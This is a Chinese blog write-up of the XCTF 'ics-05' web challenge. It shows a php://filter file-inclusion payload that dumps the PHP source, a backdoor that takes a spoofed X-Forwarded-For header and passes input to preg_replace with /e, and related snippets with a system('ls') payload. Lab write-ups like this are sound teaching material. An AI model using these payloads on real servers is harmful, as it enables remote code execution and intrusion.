攻防世界 ics-05

最新推荐文章于 2025-01-03 15:30:22 发布
最新推荐文章于 2025-01-03 15:30:22 发布
阅读量145 收藏
点赞数
分类专栏: ctf刷题纪 文章标签: php web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_52268949/article/details/129696849
版权

进入题目依旧是这个场景我们去设备维护中心看看
在这里插入图片描述
然后去云平台设备维护中心
在这里插入图片描述
我们重点来观察url发现这里可能存在文件包含,我们使用伪协议读取看看

php://filter/convert.base64-encode/resource=index.php

在这里插入图片描述
发现加密后的base64

我们解密发现源码

<?php
error_reporting(0);

@session_start();
posix_setuid(1000);


?>
<!DOCTYPE HTML>
<html>

<head>
    <meta charset="utf-8">
    <meta name="renderer" content="webkit">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
    <link rel="stylesheet" href="layui/css/layui.css" media="all">
    <title>设备维护中心</title>
    <meta charset="utf-8">
</head>

<body>
    <ul class="layui-nav">
        <li class="layui-nav-item layui-this"><a href="?page=index">云平台设备维护中心</a></li>
    </ul>
    <fieldset class="layui-elem-field layui-field-title" style="margin-top: 30px;">
        <legend>设备列表</legend>
    </fieldset>
    <table class="layui-hide" id="test"></table>
    <script type="text/html" id="switchTpl">
        <!-- 这里的 checked 的状态只是演示 -->
        <input type="checkbox" name="sex" value="{{d.id}}" lay-skin="switch" lay-text="开|关" lay-filter="checkDemo" {{ d.id==1 0003 ? 'checked' : '' }}>
    </script>
    <script src="layui/layui.js" charset="utf-8"></script>
    <script>
    layui.use('table', function() {
        var table = layui.table,
            form = layui.form;

        table.render({
            elem: '#test',
            url: '/somrthing.json',
            cellMinWidth: 80,
            cols: [
                [
                    { type: 'numbers' },
                     { type: 'checkbox' },
                     { field: 'id', title: 'ID', width: 100, unresize: true, sort: true },
                     { field: 'name', title: '设备名', templet: '#nameTpl' },
                     { field: 'area', title: '区域' },
                     { field: 'status', title: '维护状态', minWidth: 120, sort: true },
                     { field: 'check', title: '设备开关', width: 85, templet: '#switchTpl', unresize: true }
                ]
            ],
            page: true
        });
    });
    </script>
    <script>
    layui.use('element', function() {
        var element = layui.element; //导航的hover效果、二级菜单等功能,需要依赖element模块
        //监听导航点击
        element.on('nav(demo)', function(elem) {
            //console.log(elem)
            layer.msg(elem.text());
        });
    });
    </script>

<?php

$page = $_GET[page];

if (isset($page)) {



if (ctype_alnum($page)) {
?>

    <br /><br /><br /><br />
    <div style="text-align:center">
        <p class="lead"><?php echo $page; die();?></p>
    <br /><br /><br /><br />

<?php

}else{

?>
        <br /><br /><br /><br />
        <div style="text-align:center">
            <p class="lead">
                <?php

                if (strpos($page, 'input') > 0) {
                    die();
                }

                if (strpos($page, 'ta:text') > 0) {
                    die();
                }

                if (strpos($page, 'text') > 0) {
                    die();
                }

                if ($page === 'index.php') {
                    die('Ok');
                }
                    include($page);
                    die();
                ?>
        </p>
        <br /><br /><br /><br />

<?php
}}


//方便的实现输入输出的功能,正在开发中的功能,只能内部人员测试

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}





?>

</body>

</html>

开始审计代码简单看了一下之后发现利用点在这里

if ($_SERVER['HTTP_X_FORWARDED_FOR'] === '127.0.0.1') {

    echo "<br >Welcome My Admin ! <br >";

    $pattern = $_GET[pat];
    $replacement = $_GET[rep];
    $subject = $_GET[sub];

    if (isset($pattern) && isset($replacement) && isset($subject)) {
        preg_replace($pattern, $replacement, $subject);
    }else{
        die();
    }

}

此处存在preg_replace函数,感觉会存在命令注入漏洞,函数作用:搜索subject中匹配pattern的部分,以replacement进行替换。此处考察的是preg_replace函数使用/e参数导致代码执行的问题。也就是说,pat值和sub值相同,rep的代码会执行。XFF改成127.0.0.1后就会通过GET方式传进来三个参数。这里调用了preg_replace函数。并且没有对pat参数进行过滤,所以这里我们可以传入"-e"触发漏洞
在这里插入图片描述
发现成功rce
在这里插入图片描述
然后直接去cat flag即可
在这里插入图片描述

【网络安全 | XCTF】攻防世界 ics-05 解题详析
等风来
05-31 5505
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统。在当前目录及其子目录中查找文件名中包含 xx 的文件,如。构造Payload如下,实现将sub中的。根据提示,进入维护中心页面。查看源代码 发现注入点。
攻防世界(web篇)---ics-05
飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘飘
06-16 1449
根据提示点击进入设备维护中心(其他页面也点不开) 发现页面也没什么可以点击的地方,乱点了几下发现云平台设备维护中心是可以点击的,虽然还是同一个页面,但是多了个get参数 不可行读取源码看看直接包含发现会直接运行php文件,那我们怎么获得源码呢,很简单,include函数只会将php文件进行执行,我们只需要将传进去的文件先进行base64编码再传给它,就会输出它的内容了,也就是源码: $_SERVER[‘HTTP_X_FORWARDED_FOR’] 这个需要请求加 preg_replace /e参数
[wp] 攻防世界 ics-05
MercyLin的博客
09-06 1338
进入题目发现也只有设备维护中心的选项可以点 page传的参数在页面会有回显,fuzz一下:
攻防世界-ics-05
m0_62094846的博客
11-17 2201
点开后发现只有设备维护中心可以点开 看到数据端口请求异常,先想到用burp修改域名,但是修改后 除了加了一句话没什么用 看看源代码,有page=index(看wp的,真想不到和文件包含有关) ?page=php://filter/read=convert.base64-encode/resource=index.php 应该是base64 <?php error_reporting(0); @session_start(); posix_setuid(1...
攻防世界ics-05
whisper_ZH的博客
10-06 1259
知识点: php伪协议: php://filter/convert.base64-encode/resource=xx.php preg_replace()函数漏洞 preg_replace函数原型: mixed preg_replace ( mixed pattern, mixed replacement, mixed subject [, int limit]) /e 修正符使 pre...
攻防世界---ics-05
qq_44065556的博客
09-26 1529
点进场景看到是很炫酷的页面,题目秒速的是:系统设备维护中心的后门入侵系统,那直奔那里 进来发现什么也没有,到处点一点 在点击时, url发送了变化 出现?page=index 那么联想到可能存在利用文件包含读取网页源码的漏洞 用php内置filter伪协议读取文件的代码: ?page=php://filter/read=convert.base64-encode/resource=index.php 访问之后页面出现一大段base64编码 之后去解码得到(给出关键部分) .
攻防世界】二十一 --- ics-05 --- 文件包含
qq_43168364的博客
12-29 520
题目 — ics-05 一、writeup 主页只有一个点可以访问 访问之后再点击下面的图表URL会发生变化 ?page查询字符串出来了 page查询字符串中存在文件包含漏洞,可以进行目录跳转 这里php://input被过滤了,无法直接使用php://input来读取flag了。需要想其他办法。直接包含index.php文件会回显Ok 想到是否做了过滤,用:php://filter/read=convert.base64-encode/resource=index.php 访问成功 解编码得到
[CTF/网络安全] 攻防世界 ics-06 解题详析
最新发布
Hacker_LaoYi的博客
01-03 588
题目描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,留下了入侵者的痕迹。报表中心含有部分数据仅栏能打开新窗口:注意到URL栏的id参数,故该初始页面(即首页)里,应包含一个特定id所对应的页面。
攻防世界——ics-05
m0_62063669的博客
06-21 2707
攻防世界——ics-05,打开题目场景,进入设备维护中心,将所有可点击的地方都点了一遍,发现只有设备维护中心可以打开在源代码中发现page=index写入参数,参数会在页面中显示有参数的话,可以尝试以下XSS(没有任何反应,失败)LFI(Local File Inclusion) 本地文件包含漏洞,指的是能打开并包含本地文件的漏洞 LFI漏洞的黑盒判断方法:如果只从URL判断,URL中path、dir、file、pag、page、archive、p、eng、语言文件等相关关键词,就可能存在文件包含漏洞。..
攻防世界ics-05
wangzhemvp的博客
04-05 752
提示:要确保 replacement 构成一个合法的 PHP 代码字符串,否则 PHP 会在报告在包含 preg_replace() 的行中出现语法解析错误。使用 /e 修饰符,preg_replace 会将 replacement 参数当作 PHP 代码执行。php://filter 伪协议查看源码 + preg_replace 函数漏洞。1.获取网页源代码。多点点界面,发现点云平台设备维护中心时,页面发生变化。page=index 输入什么显示什么,有回显。用php://filter读取网页源代码。
攻防世界ics-05PHP伪协议+代码审计+Linux指令)
2302_79800344的博客
04-08 1998
它表示在执行替换时将替换字符串作为 PHP 代码进行评估和执行。修饰符在 PHP 中已经被废弃。
攻防世界-web-ics-05
wyjcxyyy的博客
12-26 747
然而,如果 && 在URL中没有被正确解码,或者在某些情况下被解释为URL的一部分而不是命令的一部分,那么它可能不会被传递给 system 函数,因此不会有回显。访问flag.php?pat=/abc/e&rep=system("ls")&sub=abc,sub和pat相同替换后有/e直接执行系统命令。:可以是一个字符串或字符串数组,表示要搜索的模式,可以是一个正则表达式。
攻防世界-web ics-05
m0_48108919的博客
02-19 2489
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 逐个点击菜单栏,发现只有设备维护中心有跳转 题目提示了利用后门入侵,首先使用dirsearch扫描网站目录,发现有个/index.php/login目录 尝试访问,发现页面有超链接,尝试点击 发现page的参数会原样输出 尝试使用php伪协议读取文件: php伪协议参考:https://www.cnblogs.com/endust/p/11804767.html 构造payload读取index.php..
攻防世界web——ics05
manerzi的博客
10-24 997
攻防世界web——ics05
攻防世界 ics-05 wp
freerats的博客
06-04 352
题目描述:其他破坏者会利用工控云管理系统设备维护中心的后门入侵系统 打开设备维护中心页面上没什么,查看源码发现?page=index 看到这个可能存在文件包含读源码的漏洞 php://filter/read=convert.base64-encode/resource=index.php 使用php协议读取index.php页面的base64格式,解码即可得到源码 源码比较长,核心部分就是以下这一段 这里的主要考点就是preg_replace()命令执行漏洞 官方的解释是 mixed preg_replac
攻防世界Webics-05
Zeker62的博客
09-02 157
靶场分析 根据提示,只有设备维护中心有后门且有用: 打开设备维护中心: 空空如也,检查源代码: 查看到存在一个?page=index的页面输入,猜想可能存在PHP的文件包含漏洞: 使用payload:?page=php://filter/read=convert.base64-encode/resource=index.php 可以得到一些base64编码,这是index.php的源代码 建议...
攻防世界web进阶ics-05 详细wp
zhwho的博客
09-10 4968
攻防世界web进阶区ics-05 wp 题目网站 根据题目提示选择设备维护中心,或者简单粗暴的全都点一遍,发现也只有设备维护中心能点开 打开后 F12 调网页源码 查看后发现 ?page=index 有page这个get参数 自然联想到可能存在利用文件包含读取网页源码的漏洞 这里给出利用php内置filter协议读取文件的代码 ?page=php://filter/read=convert....
攻防世界ics-06
08-12
对不起,你提供的引用内容没有包含任何问题。请提供一个明确的问题,我将很乐意帮助你回答。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [攻防世界--ics-06](https://blog.youkuaiyun.com/m0_67467924/article/details/129679123)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] - *2* *3* [攻防世界Webics-06、unserialize3、supersqli”题解](https://blog.youkuaiyun.com/qq_53325209/article/details/124255388)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值